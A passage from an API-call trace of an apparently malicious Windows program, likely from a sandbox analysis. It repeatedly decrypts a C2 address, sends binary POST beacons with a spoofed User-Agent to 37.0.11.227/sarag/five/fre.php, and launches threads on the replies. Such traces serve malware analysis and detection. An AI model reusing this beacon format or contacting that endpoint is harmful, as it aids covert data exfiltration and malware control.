(lpLibFileName="shlwapi") returned 0x76ed0000 [0337.078] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0337.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.079] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0337.079] GetProcessHeap () returned 0x690000 [0337.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0337.079] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0337.080] GetProcessHeap () returned 0x690000 [0337.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0337.080] GetProcessHeap () returned 0x690000 [0337.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0337.081] GetProcessHeap () returned 0x690000 [0337.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0337.081] GetProcessHeap () returned 0x690000 [0337.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0337.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.089] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0337.100] GetProcessHeap () returned 0x690000 [0337.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0337.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.101] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0337.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.103] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0337.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.104] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0337.104] GetProcessHeap () returned 0x690000 [0337.104] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0337.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.106] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0337.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.109] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0337.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.110] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0337.110] GetProcessHeap () returned 0x690000 [0337.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0337.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.111] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0337.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.113] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0337.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.114] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0337.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.115] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0337.115] GetProcessHeap () returned 0x690000 [0337.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0337.115] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0337.115] GetProcessHeap () returned 0x690000 [0337.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0337.115] socket (af=2, type=1, protocol=6) returned 0xc0c [0337.116] connect (s=0xc0c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0337.141] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0337.142] GetProcessHeap () returned 0x690000 [0337.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0337.142] GetProcessHeap () returned 0x690000 [0337.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0337.143] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0337.144] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0337.144] GetProcessHeap () returned 0x690000 [0337.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0337.144] GetProcessHeap () returned 0x690000 [0337.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0337.145] GetProcessHeap () returned 0x690000 [0337.145] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0337.145] GetProcessHeap () returned 0x690000 [0337.145] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0337.146] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0337.146] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0337.147] GetProcessHeap () returned 0x690000 [0337.147] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0337.147] GetProcessHeap () returned 0x690000 [0337.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0337.147] send (s=0xc0c, buf=0x6ad508*, len=242, flags=0) returned 242 [0337.148] send (s=0xc0c, buf=0x6aba40*, len=159, flags=0) returned 159 [0337.148] GetProcessHeap () returned 0x690000 [0337.148] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0337.148] recv (in: s=0xc0c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0337.215] GetProcessHeap () returned 0x690000 [0337.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0337.216] GetProcessHeap () returned 0x690000 [0337.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0337.216] GetProcessHeap () returned 0x690000 [0337.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0337.222] GetProcessHeap () returned 0x690000 [0337.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0337.223] closesocket (s=0xc0c) returned 0 [0337.224] GetProcessHeap () returned 0x690000 [0337.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0337.224] GetProcessHeap () returned 0x690000 [0337.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0337.225] GetProcessHeap () returned 0x690000 [0337.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0337.226] GetProcessHeap () returned 0x690000 [0337.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0337.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x195c) returned 0xc0c [0337.233] Sleep (dwMilliseconds=0xea60) [0337.235] GetProcessHeap () returned 0x690000 [0337.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0337.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.255] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0337.278] GetProcessHeap () returned 0x690000 [0337.278] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0337.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.279] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0337.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.280] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0337.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.281] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0337.281] GetProcessHeap () returned 0x690000 [0337.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0337.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.282] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0337.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.287] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0337.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.290] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0337.290] GetProcessHeap () returned 0x690000 [0337.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0337.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.291] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0337.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.292] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0337.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.293] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0337.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.294] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0337.294] GetProcessHeap () returned 0x690000 [0337.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0337.294] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0337.294] GetProcessHeap () returned 0x690000 [0337.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0337.295] GetProcessHeap () returned 0x690000 [0337.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0337.296] GetProcessHeap () returned 0x690000 [0337.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0337.297] GetProcessHeap () returned 0x690000 [0337.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0337.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.300] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0337.322] GetProcessHeap () returned 0x690000 [0337.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0337.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.323] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0337.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.324] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0337.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.325] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0337.325] GetProcessHeap () returned 0x690000 [0337.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0337.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.343] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0337.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.344] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0337.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.345] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0337.345] GetProcessHeap () returned 0x690000 [0337.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0337.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.346] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0337.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.350] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0337.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.350] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0337.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.351] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0337.351] GetProcessHeap () returned 0x690000 [0337.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0337.352] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0337.352] GetProcessHeap () returned 0x690000 [0337.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0337.352] socket (af=2, type=1, protocol=6) returned 0xc10 [0337.352] connect (s=0xc10, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0337.375] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0337.375] GetProcessHeap () returned 0x690000 [0337.375] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0337.375] GetProcessHeap () returned 0x690000 [0337.375] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0337.375] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0337.376] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0337.376] GetProcessHeap () returned 0x690000 [0337.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0337.376] GetProcessHeap () returned 0x690000 [0337.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0337.377] GetProcessHeap () returned 0x690000 [0337.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0337.377] GetProcessHeap () returned 0x690000 [0337.377] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0337.378] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0337.379] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0337.379] GetProcessHeap () returned 0x690000 [0337.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0337.379] GetProcessHeap () returned 0x690000 [0337.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0337.379] send (s=0xc10, buf=0x6ad508*, len=242, flags=0) returned 242 [0337.381] send (s=0xc10, buf=0x6aba40*, len=159, flags=0) returned 159 [0337.381] GetProcessHeap () returned 0x690000 [0337.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0337.382] recv (in: s=0xc10, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0337.454] GetProcessHeap () returned 0x690000 [0337.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0337.454] GetProcessHeap () returned 0x690000 [0337.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0337.455] GetProcessHeap () returned 0x690000 [0337.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0337.455] GetProcessHeap () returned 0x690000 [0337.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0337.455] closesocket (s=0xc10) returned 0 [0337.458] GetProcessHeap () returned 0x690000 [0337.458] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0337.458] GetProcessHeap () returned 0x690000 [0337.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0337.459] GetProcessHeap () returned 0x690000 [0337.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0337.459] GetProcessHeap () returned 0x690000 [0337.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0337.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1960) returned 0xc10 [0337.461] Sleep (dwMilliseconds=0xea60) [0337.463] GetProcessHeap () returned 0x690000 [0337.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0337.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0337.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.484] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0337.493] GetProcessHeap () returned 0x690000 [0337.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0337.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.494] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0337.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.495] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0337.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.643] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0337.643] GetProcessHeap () returned 0x690000 [0337.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0337.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.656] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0337.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.660] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0337.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0337.661] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0337.661] GetProcessHeap () returned 0x690000 [0337.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0337.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.662] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0337.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.662] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0337.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0337.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0337.665] GetProcessHeap () returned 0x690000 [0337.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0337.682] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0337.682] GetProcessHeap () returned 0x690000 [0337.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) 